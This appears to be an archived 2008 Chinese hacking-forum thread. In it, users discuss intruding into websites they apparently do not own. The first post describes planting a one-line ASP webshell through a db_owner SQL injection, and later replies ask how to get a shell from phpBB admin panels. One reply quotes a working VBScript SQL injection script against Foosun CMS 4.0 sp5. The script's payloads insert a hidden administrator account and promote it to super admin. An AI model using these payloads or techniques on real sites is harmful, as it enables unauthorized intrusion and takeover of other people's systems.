[讨论]入侵时遇到的阻碍
[讨论]入侵时遇到的阻碍议题作者:落叶纷飞
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
刚在搞一个站,找到了一个db_owner的注入点,能列目录
找到WEB目录后,我马上备份了一句话到WEB目录
但是在备份出来的一句话却提示如下:
Active Server Pages 错误 'ASP 0116'
丢失脚本关闭分隔符
/admin/r.asp,行 66
Script 块缺少脚本关闭标记(%>)。
请问是不是过滤了“%>”啊?还是别的原因?该怎么解决啊?小鸡鸡重出江湖了~~!!
帖子119 精华[url=http://forum.eviloctal.com/digest.php?authorid=133543]0[/url] 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133543]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33551&repquote=145708&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33551&pid=145708&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] EST上貌似有过讨论的帖子。你自己找找看吧。~~[img]http://forum.eviloctal.com/images/smilies/tuzki/21.gif[/img]昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33551&repquote=145709&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33551&pid=145709&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-49973.html]xyf1987[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 兄弟,借个地方发帖求助。
我很菜啊。请教大家:
这样的代码如何编译利用??
引用:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com
Dim strData, strUrl, strGetinfo, xPost
strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username>'</username></body>"
strUrl = "http://demo.foosun.net/api/API_Response.asp"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", strUrl, False
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.SetRequestHeader "Referer", strUrl
xPost.send(strData)
'strGetinfo = xPost.ResponseText
strGetinfo = bytes2BSTR(xPost.ResponseBody)
Wscript.echo(strGetinfo)
Wscript.Quit
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 将返回内容转换成简体中文
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem ';insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values('Tr4c3','83aa400af464c76d')-- 添加一个普通管理员Tr4c3,密码12345678
Rem ';update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name='Tr4c3'-- 把Tr4c3提升为超级管理员
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
帖子17 精华[url=http://forum.eviloctal.com/digest.php?authorid=49973]0[/url] 积分64 阅读权限40 在线时间19 小时 注册时间2006-5-24 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=49973]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33551&repquote=145717&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33551&pid=145717&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-165864.html]magickingdom123[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我也借个地方 兄弟
加急 各位大哥们 PHPBB2的后台 除了那个恢复数据的方法拿SHELL 还有其他的吗 ?如果用那个恢复数据库的方法 找不到路径怎么办 我访问那个DB下的文件也没有暴出来 还有就是PHPBB3 如何从后台拿SHELL啊 各位大哥 给点指教 谢谢啊 Q 764994885[img]http://forum.eviloctal.com/images/smilies/default/handshake.gif[/img]
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=165864]0[/url] 积分3 阅读权限40 在线时间0 小时 注册时间2008-7-15 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=165864]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33551&repquote=145729&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33551&pid=145729&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-161103.html]坏苹果[/url] [img]http://forum.eviloctal.com/images/avatars/10.gif[/img]
晶莹剔透§烈日灼然 遇到过这样的情况。。
MS是备份一句话的时候
把后面的一些%>给过滤了。。。反其道而行之
[url=http://wpa.qq.com/msgrd?V=1&Uin=395351907&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=161103]0[/url] 积分19 阅读权限40 性别男 在线时间7 小时 注册时间2008-3-26 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=161103]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33551&repquote=145770&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33551&pid=145770&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-6528.html]angel[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal1.gif[/img]
晶莹剔透§烈日灼然
页:
[1]